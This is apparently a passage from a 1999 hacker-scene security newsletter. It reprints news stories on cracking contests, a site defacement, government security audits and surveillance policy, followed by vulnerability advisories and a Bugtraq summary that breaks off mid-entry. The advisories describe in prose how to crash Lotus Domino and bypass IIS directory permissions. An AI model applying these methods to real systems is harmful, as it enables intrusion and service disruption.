"Integrated security solutions are a good idea," Spencer said. "[But] the way
that you implement security solutions as opposed to whether or not the
product comes bundled is more important."

Bundling anti-virus software with security mechanisms located at the perimeter
of a network is advantageous because everything coming in to the environment
is checked, and network administrators do not have to worry if end users
have updated their software, said Lance Travis, service director at
Boston-based AMR Research Inc. However, that method also has its
drawbacks, he noted.

"You're now scanning every e-mail message [and] every Web page that
comes through your firewall," Travis said. "There's a huge performance
penalty you could potentially pay."

Trend Micro Inc. is an anti-virus firm that has chosen not to bundle its
anti-virus software with other security products. Instead, the company is
designing its products so that they will interoperate with other key products
needed for security, said Dan Schrader, Trend Micro's vice president of new
technology.

Trend Micro offers an integrated border security approach, scanning for
viruses at perimeter points such as e-mail servers and Internet gateways. That
approach was designed to stop viruses and malicious code before they enter
the network.

Trend Micro's anti-virus software is being used by the Department of Housing
and Urban Development on 75 servers to support about 11,000 users. The
product was designed to eliminate the expensive and disruptive "pre-

emptive e-mail shutdown" strategy that many government agencies are forced
to deploy when threatened with viral infection, Schrader said.

"You want to identify where key Internet traffic enters your organization and
have the code scanner at those entry points," Schrader said. "Anything that
relies on the end users for best practices is doomed to fail."

Many anti-virus vendors are moving to take control of the software away from
end users, who notoriously try to bypass the software safeguard or forget to
update it to protect from new viruses. But Roger Thompson, technical director
of malicious code research at the International Computer Security
Association, noted that anti-virus software still must be multilayered.

"If an infected document is attached to an e-mail, then something at the mail
server or firewall wouldn't pick it up if the document was encrypted,"
Thompson said. "You still have to have detection on the desktops."

Anti-virus software vendors may see the demand for their products increase
even more in the future as virus-like threats to networks continue to grow.

William Orvis, security specialist at the Computer Incident Advisory
Capability at Lawrence Livermore National Laboratory, noted that he is
seeing an increasing incidence of worms - programs that crawl through
networks, automatically making and distributing copies of themselves while
installing dangerous back doors in systems as they move. As a result,
unauthorized users can remotely control a system with a back door installed.

Anti-virus software can be designed to watch networks for worms. However,
Orvis said products of the future will have to "intelligently" detect viruses that
have never been seen before, instead of relying on tracking viruses by their
"signatures," which is the most common viral-detection method today.

"We need a way that we can have smart computer code...and say, 'That is
probably a virus,' " Orvis said. "We need to learn to teach a machine to
recognize a virus."

Harreld is a free-lance writer based in Cary, N.C.

@HWA

48.0 RETROSPECTIVE ON CRACKING CONTESTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Thursday 26th August 1999 on 3:25 am CET
We covered both Windows2000 and LinuxPPC cracking contests on HNS. Linux
machine got one-tenth the number of attacks that the Microsoft server has endured.
Neither of servers was compromised, and the companies said data stored within
those servers has remained secure. ABC has an article on it. Read it here.

<insert> Microsoft and Linux PPC
Engage in Testing
One-Upsmanship

Microsoft put a bullseye on its Windows
2000 operating system by inviting hackers
to have a go at it. So far the system has
crashed, but hackers haven't gained
access. (A.Shepherd/ABCNEWS.com)



By Michael J. Martinez
ABCNEWS.com
Aug. 24 — Three weeks ago, Microsoft engineers
loaded up a server with Windows 2000 beta,
connected it to the Internet and invited anyone
who wanted to test its security by trying to
break into it.
The next day two things happened: the Windows 2000
operating system crashed because of a bug, and Linux
PPC, a small company in Hales Corners, Wis., put up a
server running a Linux-based operating system and issued
the same invitation.
Since then, both servers have gone down due to
various technical problems, though neither has been
“cracked;” no one has been able to access the information
stored on those servers. Both Microsoft and Linux PPC
have claimed the tests demonstrate the security of their
respective operating systems, though the frequency of
problems on the Microsoft server has been a source of
jokes among Linux enthusiasts.

Microsoft Puts On a Bullseye
The new Windows 2000 operating system, due to be
released in October, will replace Windows NT as
Microsoft’s workstation and server operating systems for
businesses. Despite a release schedule marred by
numerous delays and in spite of the growth of popularity
of competing systems — particularly those of Linux —
Microsoft hopes the new operating system will be as
broadly accepted as its predecessors.
So, on Aug. 2, Microsoft loaded a 500 MHz Pentium
III server with Windows 2000 and the IIS Web server
program, and linked it to the Internet. The system lacked
a firewall — impermeable software designed to protect a
system’s entry points — and was protected only by the
security inherent to the Windows 2000 operating system.
The next day, router failures (not hackers) caused
intermittent downtimes. The problems continued until Aug.
14, the first day without downtime on the server. Since
then, there have been three other disruptions.
On the test Web site, Microsoft managers note that no
data has been taken from the machine — it still remains
secure. In addition, a number of software bugs in the
Windows 2000 software have been discovered and fixed.

Linux Chimes In
The day Microsoft announced its tests, the engineers at
Linux PPC began receiving user e-mails wondering if the
company would respond in kind. Linux PPC is different
from other Linux distributors; its OS is made for
Macintoshes instead of the usual IBM clones.
“The response from our users was enormous,” says
Marcia Knapp, business manager for the company. “They
were confident that our software could withstand much
more than Microsoft’s, so we decided to put a box up.”
The Linux PPC machine is a far cry from the high-end
server Microsoft is using. The company is using a 132
MHz Power Macintosh with just 160 MB of RAM, and
the machine is running an open-source Apache Web
server.
Yet the Linux machine has only gone down twice —
and one of those times was because someone tripped on
a cord. The other time was because of a successful denial
of service attack — the server was crashed not because
of a security breach, but because someone attempted to
overload it with meaningless data.

Under Attack
It should be noted that the Linux machine is getting
one-tenth the number of attacks that the Microsoft server
has endured — and that the Windows 2000 operating
system is still in beta, and is due for more debugging once
it has been released.
Still, both sides claim the data stored within those
servers has remained secure. It may have been just
another PR stunt. But once again Microsoft comes out
looking like a giant with egg on his face — egg tossed by
a tiny rival in Wisconsin.

@HWA


49.0 SHOUTCAST COMPROMISED
~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Wednesday 25th August 1999 on 10:39 pm CET
ShoutCAST (yp.shoutcast.com) - online directory of sites that offer you listening MP3
music on-line, has been compromised earlier today. Attacker just changed info for the
best ranked sites to: " [skillz] MadCamel 0wns Nullsoft Now Playing: Greetz arr0w
listeners -31337/31337 Bitrate - 666 and added an additional link to
www.rootshell.com.

@HWA

50.0 AUDIT OFFICE BLASTS AGENCIES' SERIOUS SECURITY FLAWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Wednesday 25th August 1999 on 11:05 am CET
A damning report from the Australian National Audit Office (ANAO), entitled
"Operation of the Classification System for Protecting Sensitive Information", has
reveiled serious flaws in the IT security arrangements of six unnamed Australian
commonwealth government agencies. The audited agencies all had sensitive
information to protect, with three of the six responsible for protecting national security
information. Read more.

http://www2.idg.com.au/CWT1997.nsf/Home+page/4C49A498F5EBCD6F4A2567D70021F2FE?OpenDocument

Audit Office blasts agencies'
serious IT security flaws

By Laura Mason
25 August, 1999

SYDNEY - A damning report from Australian
National Audit Office (ANAO) has revealed
serious flaws in the IT security arrangements of six
commonwealth government agencies.
Entitled 'Operation of The Classification System for
Protecting Sensitive Information' the report reveals
that the IT&T environments of the six unnamed
agencies the ANAO audited have inadequate
security protection levels.
The audited agencies all had sensitive information
to protect, with three of the six respon-sible for
protecting national security information. "Paper and
electronic files were often exposed to unauthorised
access because of various breakdowns in the
protection of information in use or in transmission,"
states the report, which was tabled this month.
Common breakdowns included "sensitive
information stored on insecure electronic networks,
and computers left on without the protection of
screen saver passwords."
All six of the agencies hold sensitive information in
both electronic and paper-based form, with two of
the six agencies operating secure networks, and
two running mainframes with large databases.
The audit found that agencies operating
mainframes, with high-volume transaction
processing, had better IT security than
organisations with a LAN based environment,
however those with mainframes were found to have
weaknesses in their LAN environment.
According to the report, "The access management
controls on local area networks (LANs) were often
not configured or implemented in accordance with
ACSI 33 (the Australian Communications
Electronic Security Instrucions 33 -- a Defence
Signal Directorate's publication).
Areas requiring attention include passwords, the
number of log-on attempts and inactive user
accounts.
These weaknesses are of concern as all the
networks carried sensitive information.
"The audit found that more attention needs to be
given to establishing effective monitoring and
review processes, particularly in relation to IT&T
audit trails to ensure security policies and
procedures are operating as management
intended," said the report.
According to ANAO, all six agencies audited are
failing to give sensitive information adequate
protection.
Dean Kingsley, Partner, Secure e-business at
Deloitte Touche Tohmatsu, commented that for
many organisations IT security, outside the context
of e commmerce, was "way down the priority list"
since it was viewed as an overhead rather than an
enabler.

@HWA

51.0 ISS X-FORCE ADVISORY ON LOTUS NOTES DOMINO SERVER 4.6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 24th August 1999 on 10:05 pm CET
ISS X-force reports a denial of service attack against the integrated messaging and
web application server, because of an overflow problem in the Notes LDAP Service.
Your are recommended to upgrade to Maintenance release 4.6.6 or 5.0. Here is the
complete advisory.

http://xforce.iss.net/alerts/advise34.php3

ISS Security Advisory
August 23, 1999

Denial of Service Attack against Lotus Notes Domino Server 4.6

Synopsis:

Lotus Domino Server is an integrated messaging and web application
server. An attacker can crash the Lotus Notes Domino server and stop
e-mail and other services that Domino provides for an organization.

Description:

There is an overflow problem in the Notes LDAP Service (NLDAP); the
service that handles the LDAP protocol. This overflow is related to the
way that NLDAP handles the ldap_search request. By sending a large amount of
data to the parameter in the ldap_search request, an attacker can cause a
PANIC in the Domino Server. This will allow an attacker to stop all Domino
services running on the affected machine.

Affected Versions: Lotus Notes Domino server 4.6.

Recommended Action: Upgrade to Maintenance release 4.6.6 or 5.0.

Additional Information:

Information in this advisory was obtained by the research of Caleb Sima
<csima@iss.net> of the ISS X-Force. ISS X-Force would like to thank Lotus
Development Corporation for their response and handling of this
vulnerability.

________


About ISS:

ISS leads the market as the source for e-business risk management
solutions, serving as a trusted security provider to thousands of
organizations including 21 of the 25 largest U.S. commercial banks and
more than 35 government agencies. With its Adaptive Security Management
approach, ISS empowers organizations to measure and manage enterprise
security risks within Intranet, extranet and electronic commerce
environments. Its award-winning SAFEsuite(r) product line of intrusion
detection, vulnerability management and decision support solutions are
vital for protection in today's world of global connectivity, enabling
organizations to proactively monitor, detect and respond to security
risks. Founded in 1994, ISS is headquartered in Atlanta, GA with
additional offices throughout the U.S. and international operations in
Australia/New Zealand, Belgium, France, Germany, Japan, Latin America and
the UK. For more information, visit the ISS Web site at www.iss.net or
call 800-776-2362.

Copyright (c) 1999 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express consent
of the X-Force. If you wish to reprint the whole or any part of this
Alert in any other medium excluding electronic medium, please e-mail
xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as
well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net
of Internet Security Systems, Inc.


@HWA

52.0 TECHNOLOGY KEY TO TRACKING DOWN INTERNET CRIME
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/


by Thejian, Tuesday 24th August 1999 on 9:45 pm CET
A recently formed working group focused on rooting out Internet-related crime may
model technologies that law enforcement agencies use to sift through the Internet to
keep tabs on online illegal activity. As we reported earlier, US president Clinton this
month established the working group to examine how law enforcement agencies can
better investigate and prosecute criminal activities conducted on the Internet. Among
other things, the group will scrutinize the ways in which the government uses
technology to crack down on Internet-related crime. The FBI is expected to take the
lead in developing technology that the federal government will use to comb the
Internet in search of criminal activity. Full story


AUGUST 23, 1999


Technology key to tracking down Internet crime

BY DOUG BROWN (dbrown@fcw.com)

A recently formed working group focused on rooting out Internet-related
crime may model technologies that law enforcement agencies use to sift
through the Internet to keep tabs on online illegal activity.

President Clinton this month established the working group, made up of top
government officials, to examine how law enforcement agencies can better
investigate and prosecute criminal activities conducted on the Internet, such as
the online sale of guns and illegal drugs, fraud and the peddling of child
pornography.

The Clinton administration decided to form the group because there was
"recognition within the government that there were some real issues"
concerning computer crime that needed to be addressed, a White House
official said. "There was an explosion [of legislation] at both the federal and
the state level, and there was concern that if we passed a lot of legislation
without taking a systematic look at this, we would end up with a haphazard
approach to the problem."

Among other things, the group will scrutinize the ways in which the
government uses technology to crack down on Internet-related crime.
Understanding the technologies agencies use now, the White House official
said, will help the administration decide how it can improve the investigation
and prosecution of online criminal activity in the future.

Some helpful technology applications may come from the FBI, a
representative from which will serve on the task force. The FBI is expected to
take the lead in developing technology that the federal government will use to
comb the Internet in search of criminal activity.

The FBI's Baltimore field office leads a project called Innocent Images, which
works to identify and arrest online sexual predators. About 20 agents are
assigned to the project full time, said Special Agent Barry Maddox, a
spokesman for the field office. Hundreds of other agents and local law
enforcement officials in cities nationwide also work with Innocent Images.

The agents join online chat groups about pedophilia or child pornography and
also pose as children to try to catch pedophiles who attempt to set up
face-to-face meetings. The program, which was established in 1995, has led
to 378 arrests and 322 convictions, Maddox said.

Advancements developed elsewhere in the FBI also may be considered by
the administration's working group. Such developments include the
soon-to-be launched computer crimes squad, which will investigate crimes
committed by hackers, and the National Infrastructure Protection Center,
which works to prevent people or groups from hacking into vital government
systems that operate such things as water supplies and transportation systems.

The group also may look at increasingly sophisticated and powerful Internet
search engines as a way to sniff out Internet-related crime, said Rich Kellett,
director of the General Services Administration's Emerging Information
Technologies Policies Division.

With some companies laboring to "store everything that is on the Internet,"
Kellett said, "you can imagine what kind of base of information you could put
together" with such databases. Combining powerful

  
search engines with
enormous databases would provide "interesting cross-sections of what is
going on in America, including criminal activity."

Kellett also mentioned the Search for Extraterrestrial Intelligence, a project
involving more than 800,000 computers networked together that share
information about radio signals and work together to compute algorithms in
the hope of pinpointing evidence of life in outer space. A model like this, he
said, could be used to sift through Internet data in search of criminal activity.

One problem with such massive undertakings, he said, is that "the use of all of
that information and sorting through it all has tremendous public policy issues,
in terms of privacy," Kellett said.

Daniel Boyle, SAS Institute Inc.'s director of the Defense Department and
defense intelligence, said the working group likely will consider different ways
of using data mining to deal with online criminal activity. The SAS Institute,
Cary, N.C., is a major supplier of custom software to the federal government.

With a tidal wave of data coursing through the Internet every day, it would be
impossible to successfully locate criminal activity just through pointing and
clicking a mouse, Boyle said. What is needed are data-mining software tools
that sift through data in search of anomalies or patterns - things that "don't
look quite right," he said. "They've got to find them first, and one of the
techniques is data mining."

Of use to government investigators, he said, might be "dump logs," or records
of people who have visited individual World Wide Web sites. Servers, he
said, "create volumes of these logs, [which] are tremendous and...exploding
every day." The logs are used by private companies to see who is visiting their
sites, but they also could be useful in tracking crime, he said.

Ari Schwartz, a policy analyst at the Washington, D.C.-based Center for
Democracy and Technology, cautioned working group members to keep
privacy concerns in mind when they draft their report, which is due in
December.

"This discussion could lead to a whole new set of monitoring tools," he said.
"We hope this doesn't change the way people surf the Net. We don't want to
have people think government is monitoring their lives."

Because it is so open, the Internet already has a vital monitoring system in
place: the eyes of the millions of people clicking throughout cyberspace. New
monitoring tools, he said, may be superfluous.

The government is considering a plan to monitor many non-DOD computers
for signs of intrusion. In its quest to protect government computers from
outside attacks, the proposed plan, called the Federal Intrusion Detection
Network, unnecessarily sacrifices privacy, Schwartz said.

@HWA


53.0 GOVT HOME-INVASION BILL DRIVES US PC USERS TO CANADA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 24th August 1999 on 9:20 pm CET
The recently proposed and already very much discussed US Justice Department bill
that would allow police to secretly enter homes and disable security features on
computers has driven tens of thousands of Americans to request privacy protection in
the form of the Freedom product from Canadian firm Zero-Knowledge Systems, the
company announced today. Newsbytes

Govt Home Invasion Bill Drives US PC Users To Canada


By Martin Stone, Newsbytes
MONTREAL, QUEBEC, CANADA,
24 Aug 1999, 12:09 PM CST

A proposed US Justice Department bill that would allow police to secretly enter homes and disable security features on
computers has driven tens of thousands of Americans to request privacy protection from Canadian firm Zero-Knowledge
Systems, the company announced today.

"This has created a huge wave of concern among computer users in the US," said Zero-Knowledge President Austin Hill, of
the proposed legislation.

Hill told Newsbytes that, when news of the proposed measure broke last Thursday, his office was flooded with calls and
messages from American Internet users inquiring about the availability of his company's security system, called Freedom,
which uses a sophisticated network of encoding and remote servers to obscure Internet "trails."

"We've received e-mail, telephone messages, and thousands of Freedom beta sign-ups from people looking to secure their
privacy. It's highly ironic that a Canadian company is being flooded by requests to protect American citizens from their own
government," Hill said.

Zero-Knowledge is presently beta-testing its Freedom technology, which provides total privacy for Web, e-mail, newsgroup,
and chat-room activities by encrypting data and rerouting it through independently-operated servers scattered worldwide.

Hill says an improved beta version will soon enter testing and that, based on the latest flood of interest, his company is
scaling-up to accommodate, what he says will be, "millions and millions of computer-users all over the world" once the
product hits the market later this year.

The system has been called "the only fully trustworthy privacy solution" by some privacy advocates.

According to reports published last week, the Justice Department will seek authorization through the Cyberspace Electronic
Security Act for FBI and local police to covertly enter private homes and disable computer encryption programs. The
proposal would dramatically increase police powers by allowing agents to tamper with personal computers to surreptitiously
monitor personal communications.

"It's disappointing that US consumers must look to other countries for protection from a government they feel is overstepping
its investigative authority," David Sobel, general counsel for the Electronic Privacy Information Center in Washington, told Hill
following the announcement of the proposed bill. "The United States should be in the forefront of privacy technology, not
trying to circumvent it."

Montreal-based Zero-Knowledge says it benefits from Canada's support for the development of strong privacy solutions, in
contrast with what it says is the US government's stringent controls on encryption and privacy technologies.

Hill says that, because his company's system masks electronic trails, law enforcement agencies would not be able to
identify computers from which possibly unlawful transmissions were being made, so they would be unable to identify which
house to enter under the proposed legislation. He says his system would discourage "fishing expeditions" which could result
from the projected bill.

More information on the Zero-Knowledge technology can be found at http://www.zeroknowledge.com

Reported by Newsbytes.com, http://www.newsbytes.com

12:09 CST
Reposted 18:09 CST

@HWA

54.0 HACKERS SCANNING FOR TROUBLE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by Thejian, Tuesday 24th August 1999 on 9:00 pm CET
Every day they come, they lurk -- then they leave without doing damage. They come
through clients' computers, through Canadian ISPs, they hack into Linux boxes, NT
boxes, Unix boxes. Hack by day or night, but they only look and don't touch. These
kinds of vulnerability scan attacks are causing concern and also bring up some
murky legal issues. Dragos Ruiu wrote a report for SecurityFocus and ZDNet has a
story on it.

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Hackers scanning for trouble
By Bob Sullivan, MSNBC
August 24, 1999 5:38 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2319298,00.html

Dragos Ruiu was just minding his own business, a Vancouver software startup, when it started.
Day after day, relentlessly, someone or some group out there on the Internet is banging away at
his servers, sneaking in and gaining full access. A security expert, he knows what's happening:
He's being probed. Is this mere sport, or a "casing," like a bank robber who visits the bank several
times to study its security systems before the heist?

Every day they come, they lurk -- then they leave without doing damage. And Ruiu is powerless
to stop it. Every method he has tried, they have trumped. They're toying with him. "They must feel
like gods," he says.

They come at him through clients' computers, through Canadian ISPs, once even through one of
the largest Canadian banks. They hack into Linux boxes, NT boxes, Unix boxes. Hack by day or
night. No matter.

And all for no apparent reason. They look, but don't touch.

Ah, the life of a network administrator these days. There are thousands of ways to break into a
computer, and there are now several downloadable software packages designed to scan the
Internet for Web sites and servers that have just one flaw.

According to Peter Tippett at computer security research firm ICSA, a new box connected to the
Net will almost certainly be "scanned" before one week goes by. And the amount of scanning
activity has doubled in the past six months.

That's about when the scanning started for Brandon Pepelea, a former employee at PSINet who
says his collection of Web sites has been scanned systematically several times a week since
January. In another example of a victimless probe, Pepelea thinks someone or something has been
banging through all the Internet addresses between 38.240.x.x and 38.200.x.x, a so-called
Class-B range of addresses that constitute about 16,000 possible computers.

In his case, the scans were unsuccessful. Whoever or whatever it is, they
haven't been able to break into Pepelea's computers. Still, the relentless,
systematic nature of the probe has him spooked. He's been demanding
that PSINet, which owns all the addresses in the 38.x.x.x range, chase down the scanner and
prosecute.

"I don't think they understand how serious it is," Pepelea said. "The threat not so much being the
nature of the scan but the scope of the scan... If you're between 38.240 and 38.200 you've had
the scans. They've walked through and gotten to you."

Nose for trouble
The attack itself involves use of the Simple Network Management Protocol, frequently used on
network routers. Pepelea owns machines between the 38.240 and 38.200 address range, and
concluded scans spanned that range by studying patterns of hits to his own and his client's
machines.

This is not the first time Pepelea, now CEO of a small security company he calls "Designer's
Dream," has done a hefty amount of personal cybersleuthing. Last December, he compiled
information on a virus writer named VicodinES, and shared it with the FBI, the CIA and other law
enforcement agencies. His tips fell on deaf ears, and VicodinES, who the world now knows as
Dave Smith, went on to release the Melissa virus. Pepelea's hell bent on being heard this time
around. "Once again, nobody cares," he laments.

PSINet said early last week the scans were being generated by an account serviced by the
company, and that it had dealt with the matter by canceling the account. But by Friday, the
company had canceled three more accounts in an effort to stop the probes. While officials there
say they take the matter seriously, they are not convinced it's an organized hacker attack.

"It's not possible to characterize whether this is a mistake, a malicious event, was planned, or it
just happened," said Cole Libby, Director of Network Engineering. For example, it could a
wrongly configured piece of hardware searching a section of the Internet for a new printer. "There
are lots of examples of technology out of control in the world."

No harm, no foul?
Scanning, the cyberspace equivalent of walking down Main Street and jiggling handles to see who
leaves the front door unlocked, brings up murky legal issues. Entering someone else's computer is
illegal, but scanning, which amounts to asking a computer how it's been set up, probably isn't.
Pepelea says PSINet told him to pursue legal action against his cyberpest -- but for what?
Meanwhile, Pepelea thinks PSINet should be liable if any real trouble ever comes from his
suspected hacker, particularly since the Net provider was warned.

That's not likely, says Internet law expert Dorsey Morrow. PSINet would almost certainly face no
criminal liability for the actions of a hacker on their network, and wouldn't likely face civil liability
either.

"As long as they can show 'We were doing everything we can. We've got security policies in
place. We're using the latest software.' That mounts up to a pretty good defense," Morrow said.

So there's no consequences for scanning, either to the hacker or the company that provides the
means. But what of Ruiu's hackers, who go just one step further than Pepelea's scanners? They
scan, then enter, lurk around, and leave. Dancing tantalizingly over the edge of the law, they show
an ability to do far more damage.

Their methods are painstakingly deliberate, designed to avoid detection. They launch attacks from
multiple sites, sometimes sending no more than a packet per day from any site, in order to hide the
kind of suspicious activity protective "sniffer" programs look for.

"We saw one new machine coming at us every five minutes," Ruiu said. "They must have felt like
gods because they could break into any machine they wanted."

That includes a collection of Canadian ISPs, and even one major Canadian bank, the hackers
broke into. When he called, Ruiu often had a tough time convincing victimized ISP administrators
they'd been hacked.

"The reaction of ISPs was disbelief," he said. "One didn't believe us until a marketing guy had his
laptop taken out and it started sending weird packets."

Ruiu is convinced the hacks are coming from a coordinated team, because of their speed and
variety. But while the cat-and-mouse game continues, he can only speculate on motive. His
company, a 15-person startup called Netsentry.net, is hardly a big target. So Ruiu thinks his
outside efforts in the security community are likely to blame. He recently worked on project called
"Trinux," which aimed to create a security-enhanced version of Linux that fits on one floppy disk.
Among his partners was Ken Williams, who until recently ran Packet Storm Security, perhaps the
most popular reference site in the hacker community.

"I suspect these guys are targeting security software," he said, but added they have not revealed
their intentions. "This is really bugging me. The lack of a motive really disturbs me…it gave me the
creeps."

The attacks have also been humbling for Ruiu, who has spent a lot of time chasing the hackers
when he could be working to get his business off the ground.

"There are a lot of assumptions we're all making about Internet security that we shouldn't," he said.
"There's a lot of things we don't know."

For example, these hackers made a habit of hijacking machines Ruiu's computers normally talked
to, then initiated attacks from these supposedly "friendly" computers. That made them almost
impossible to detect.

"If they get a machine that's close to your machine, that's almost as bad as taking over your Web
server. It's a great place to launch an attack on your firewall," he said.

Nothing about Ruiu or Pepelea's stories surprised ICSA's Tippett, who expects security problems
to get worse before they get better.

"It's the wild, wild West out there," he said. "The tools are pervasive and so common. The chance
of getting caught is pretty slim… Our neighbors are now very close and enough of them don't have
a great social conscience."

A more extensive report on the one of these attacks, written by Ruiu, can be found at
www.securityfocus.com.

@HWA

55.0 Canada Net they've built a super fast network, but what to do with it?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Great Wired North


Canada Builds the World’s
Fastest Network — And
Wonders How to Use It

Canada’s new CA*Net3 research network
will link government, business and
universties across the country with a 100
percent fiber-optic network
and then what? (ABCNEWS.com)



By Michael J. Martinez
ABCNEWS.com
Aug. 27 — What if there were a
brand-new, fiber-optic,
blazingly fast, nationwide
computer network — and no
one knew quite what to do
with it?
Using a $55 million grant from the
Canadian government, a consortium of universities and
businesses has fashioned a next-generation, Internet-style
network, stretching from Nova Scotia to British Columbia.
So speedy is CA*Net3, as the network is called, that the
entire contents of the U.S. Library of Congress could be
transmitted from one end of Canada to the other in just one
second.
In the United States, the Internet2 project can handle
that kind of load — but it still takes a full minute for a
bicoastal download.
Canada hopes to use this world’s fastest nationwide
network to stake its claim to the high-tech future. Unlike
Internet2, however, CA*Net3 is finding it difficult to attract
researchers who can use the brand-new network.
“Nobody knows what we’re going to use this for,” says
Alan Greenberg, director of computing at McGill University
in Montreal. “But that’s the reason you build these things
— so that people can find new ways to do things.”

Pure Optics
Unlike other research networks, including the ARPANet
system that formed the basis for today’s Internet, CA*Net3
is completely optical — no telephone lines are used.
Instead, the Canadian government stretched fiber-optic
cable across the country, linking it to 11 “gigapops,”
network hubs that serve as switching stations for billions of
bits of data per second.
Other networks, including Internet2 and the
Next-Generation Internet project in the United States, also
use backup layers, in addition to fiber optics, to ensure that
data will continue to flow if the fiber-optic cables are cut or
disrupted. However, CA*Net3 doesn’t have those backups.
Instead, data are automatically rerouted at the gigapops if a
disruption is detected. Rerouting uses network rings —
loops of cable interconnected with the gigapops.
“In our network rings, we automatically use both sides
of the ring in transmitting data,” says Bill St. Arnaud, the
senior director of network projects for the Canadian
Network for the Advancement of Research, Industry and
Education (Canarie), which is running CA*Net3. “Thus, if
one side of the loop goes down, the other side can pick up
the slack.”

Rainbow of Data
CA*Net3 also employs new technology that allows
different wavelengths of light to be transmitted along the
same fiber-optic cable. By using eight colors of light, the
amount of data sent through the cable can be increased by
a factor of eight.
That means 80 gigabits of data per second can be
transmitted through CA*Net3 every second. That’s 1.4
million times faster than the download speed of a 56K
modem, and about 60 times faster than America’s Internet2
project.
And it could improve even more, St. Arnaud says.
Theoretically, an infinite number of wavelengths of light
could pass through a fiber-optic cable without interfering
with each other. Right now, researchers are working on
transmitting data on 2,000 wavelengths — somewhere in
the neighborhood of 20,000 gigabits or 20 terabits.

Filling the Pipe
Now all that’s needed are applications to make use of such
huge bandwidth.
“Everyone is used to dealing with small bandwidth,”
Greenberg says. “They’re still trying to figure out how best
to use this really big pipe they’ve been handed.”
A few ideas have been advanced. Canada’s national
human genome project, an effort to map all the DNA in the
human body, is using CA*Net3 to link 40 powerful
computers to perform necessary calculations.
The Canadian National Film Board is also using the
network, to create an on-demand movie jukebox.
Computers linked to CA*Net3 can request one of 700
movies currently online. The film board’s server controls a
robotic arm that can select and play the DVD-ROM of the
film, sending it over CA*Net3.
In the next few years, St. Arnaud hopes to link public
schools to the new network, using only fiber-optic cables
and giving schools total access to the immense amount of
bandwidth available. From there, it’s easy to envision
connecting every Canadian home to the optical network.
With an increase in the number of light wavelengths
available, there will be enough bandwidth for generations.
And what they’ll do with it is anyone’s guess.

@HWA

56.0 Security Focus' BUGTRAQ summary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Focus News, Issue 3, 1999-08-16 to 1999-08-22



II. BUGTRAQ SUMMARY 1999-08-16 to 1999-08-22
----------------------------------------


1. SuSE identd Denial of Service Attack
Bugtraq ID: 587
Remote: Yes
Date Published: 1999-08-16
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=587
Summary:
In certain distributions of SuSE Linux the in.identd daemon is started
with an option that causes one identd process waits 120 seconds
after answering the first request to answer the next request. If a
malicious remote attacker starts a large number of ident requests in
a short period of time it will force the target machine to start multiple
daemons. This can lead the machine to starve itself of memory
resulting essentially in a machine halt.



2: Microsoft IIS And PWS 8.3 Directory Name Vulnerability
Bugtraq ID: 582
Remote: Yes
Date Published: 1999-08-16
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=582
Summary:
In Microsoft's IIS and PWS, requesting the 8.3 filename version of a
directory effectively bypasses the security attributes that are
referenced to the full, long version of the filename, with permissions
being based instead on those of the parent directory. Successful
exploitation of this vulnerability could lead not only to unathorized
directory listings, but also to the remote execution of
'protected' scripts.



3: Multiple Vendor 8.3 Directory Name Vulnerability
Bugtraq ID: 584
Remote: Yes
Date Published: 1999-08-16
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=584
Summary:
In the Netscape, vqServer and Xitami webservers, restrictions applied to
directories with long filenames will be ignored if the 8.3
version of the filename is requested. In Serv-U, the 'cwd' and 'site exec'
commands are susceptible to a similar vulnerability. Other
Windows32-based HTTP and FTP servers may have the same or similar
vulnerabilities.



4: Microsoft Windows 98 IE5/Telnet Heap Overflow Vulnerability
Bugtraq ID: 586
Remote: Yes
Date Published: 1999-08-16
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=586
Summary:
Windows 98 systems running specific versions of IE5 (5.00.2314.1003 and
5.00.2314.1003IC) are susceptible to a remote vulnerability that
allows the execution of arbitrary code on a target that views a malicious
web page. This vulnerability is due to a combination of two different
weaknesses, one in telnet.exe and one in the latest versions of IE5.




5: Oracle Intelligent Agent Vulnerability
Bugtraq ID: 585
Remote: Yes
Date Published: 1999-08-16
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=585
Summary:
Oracle installations with the 'Oracle Intelligent Agent' installed have a
path related vulnerability. The problem lies in the dbsnmp
program located in $ORACLE_HOME/bin . This setuid root program calls a tcl
script ( nmiconf.tcl ) located by default in
$ORACLE_HOME/network/agent/config. The problem is that the dbsnmp script
relies on an environment variable (the path to nmiconf.tcl) which can be a
set by a user. Therefore, intruders can force the script to execute a
trojaned version of nmiconf.tcl which will run as root.



6: xmonisdn IFS/PATH Vulnerability
Bugtraq ID: 583
Remote: No
Date Published: 1999-08-16
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=583
Summary:
